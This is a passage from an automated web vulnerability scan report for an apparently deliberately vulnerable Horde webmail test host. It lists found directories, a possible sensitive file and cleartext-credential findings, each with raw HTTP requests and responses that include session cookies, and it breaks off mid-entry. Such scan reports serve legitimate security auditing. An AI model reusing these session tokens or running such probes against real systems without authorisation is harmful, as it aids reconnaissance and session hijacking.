Details | ||||||||||||||||||
No details are available. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/config HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/config/ Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:31:22 GMT Content-Length: 169 |
||||||||||||||||||
/imp/js/src | ||||||||||||||||||
Details | ||||||||||||||||||
No details are available. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/js/src HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/js/src/ Server: Microsoft-IIS/7.5 |
||||||||||||||||||
Acunetix Website Audit | 27 |
X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:37:03 GMT |
||||||||||||||||||
/imp/scripts | ||||||||||||||||||
Details | ||||||||||||||||||
No details are available. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/scripts HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/scripts/ Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:30:23 GMT Content-Length: 170 |
||||||||||||||||||
/imp/scripts/SQL | ||||||||||||||||||
Details | ||||||||||||||||||
No details are available. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/scripts/SQL HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/scripts/SQL/ Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 16:38:09 GMT Content-Length: 174 |
||||||||||||||||||
/imp/scripts/sql | ||||||||||||||||||
Details | ||||||||||||||||||
No details are available. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/scripts/sql HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Acunetix Website Audit | 28 |
Response | ||||||||||||||||||
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/scripts/sql/ Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 16:38:09 GMT Content-Length: 174 |
||||||||||||||||||
/js/src | ||||||||||||||||||
Details | ||||||||||||||||||
No details are available. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /js/src HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: http://vulnerable.horde.webmail.version3.3.11.host/js/src/ Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:36:31 GMT Content-Length: 165 |
||||||||||||||||||
Possible sensitive files | ||||||||||||||||||
![]() |
||||||||||||||||||
Severity | Low | |||||||||||||||||
Type | Validation | |||||||||||||||||
Reported by module | Scripting (Possible_Sensitive_Files.script) | |||||||||||||||||
Description | ||||||||||||||||||
A possible sensitive file has been found. This file is not directly linked from the website. This check looks for common sensitive resources like password files, configuration files, log files, include files, statistics data, database dumps. Each one of these files could help an attacker to learn more about his target. | ||||||||||||||||||
Impact | ||||||||||||||||||
This file may expose sensitive information that could help a malicious user to prepare more advanced attacks. | ||||||||||||||||||
Recommendation | ||||||||||||||||||
Restrict access to this file or remove it from the website. | ||||||||||||||||||
Affected items | ||||||||||||||||||
/imp/test.php | ||||||||||||||||||
Details | ||||||||||||||||||
No details are available. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/test.php HTTP/1.1 Accept: acunetix/wvs Range: bytes=0-99999 Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 |
||||||||||||||||||
Acunetix Website Audit | 29 |
Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:30:26 GMT Content-Length: 4560 |
||||||||||||||||||
User credentials are sent in clear text | ||||||||||||||||||
![]() |
||||||||||||||||||
Severity | Low | |||||||||||||||||
Type | Informational | |||||||||||||||||
Reported by module | Crawler | |||||||||||||||||
Description | ||||||||||||||||||
User credentials are not encrypted when they are transmitted. | ||||||||||||||||||
Impact | ||||||||||||||||||
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection. | ||||||||||||||||||
Recommendation | ||||||||||||||||||
Because user credentials usually are considered sensitive information, it is recommended to be sent to the server over an encrypted connection. | ||||||||||||||||||
Affected items | ||||||||||||||||||
/imp | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/ HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/ Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:11 GMT Content-Length: 10191 |
||||||||||||||||||
Acunetix Website Audit | 30 |
/imp/index.php | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/index.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:11 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 Set-Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host Set-Cookie: imp_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host Set-Cookie: auth_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:03 GMT Content-Length: 10312 |
||||||||||||||||||
/imp/login.php (0543eee9a9fc90cdbcebb4184dc0f436) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Acunetix Website Audit | 31 |
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=UkHoj_BUzaHgQnp7cwu9IPDGdx0&imapuser=cderdwxu&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (158764c7d282ec5f81da00419114f313) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Traditional)%20(%26%23x6b63;%26%23x9ad4;%26%23x4e2d;%26%23x6587;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:22 GMT Content-Length: 10190 |
||||||||||||||||||
/imp/login.php (1d46c5eb93aa7d11eef06bf0a0191c08) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET | ||||||||||||||||||
Acunetix Website Audit | 32 |
/imp/login.php?app=imp&horde_logout_token=9kdIZoVZfUu0i92_Wr0XpxEkycw&imapuser=kknytbhi&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (1d86503a775e69aaf8cfae2e3c4262b8) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=8MnlK_AkVv_w-etJcyh00h3qZtk&imapuser=atsoewoc&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (218aabb29b4f5701fbeef27d6e22e8ae) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Bulgarian%20(%26%23x0411;%26%23x044a;%26%23x043b;%26%23x0433;%26%23x0430;%26%23x0440;%26%23x0441;%26%23x043a;%26%23x0438;) HTTP/1.1 Pragma: no-cache |
||||||||||||||||||
Acunetix Website Audit | 33 |
Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (28fc832e122bfd3d7aa0d9fc9e93c214) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=fxkAiJl0cUvTGsyglzEAgwmsGvk&imapuser=bsximucj&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (2a85dcb007870d301225d725fb7aced5) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=S9hLBWmjg9w-hz-Cez65kwSQFDI&imapuser=hkuhjfvd&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts |
||||||||||||||||||
Acunetix Website Audit | 34 |
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:10 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (36ce5744f27f6f06f85c2dac9f0ac09c) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=rpo9s0fEQvr-PL8-6YEmPmL6eYE&imapuser=vhqsmkqh&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (3a784d3148a695e5246e4f7712293772) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=4IdDEVByjuc3qQ9aCCZa_zV1Ju0&imapuser=lyoxhoba&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 |
||||||||||||||||||
Acunetix Website Audit | 35 |
Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (4435f865242a495136a5f5376d63a435) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=pdL5-YjGG7Nh5C6m9jNlmZpORww&imapuser=ivxkbmfl&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (4bff40967d6a993cb33f6ffe4f726c45) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Simplified)%20(%26%23x7b80;%26%23x4f53;%26%23x4e2d;%26%23x6587;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Acunetix Website Audit | 36 |
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (733b34e2771d847f3e677868a914fc27) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=TDQA5rJjyTg4m99KcTR4_kGc2Ck&imapuser=ggqsiwfl&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10395 |
||||||||||||||||||
/imp/login.php (7f2892c38a099a99d15882e6395df8ed) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Dansk HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 |
||||||||||||||||||
Acunetix Website Audit | 37 |
Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:22 GMT |
||||||||||||||||||
/imp/login.php (81366dbb3a1b19d17070dae7247058f6) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
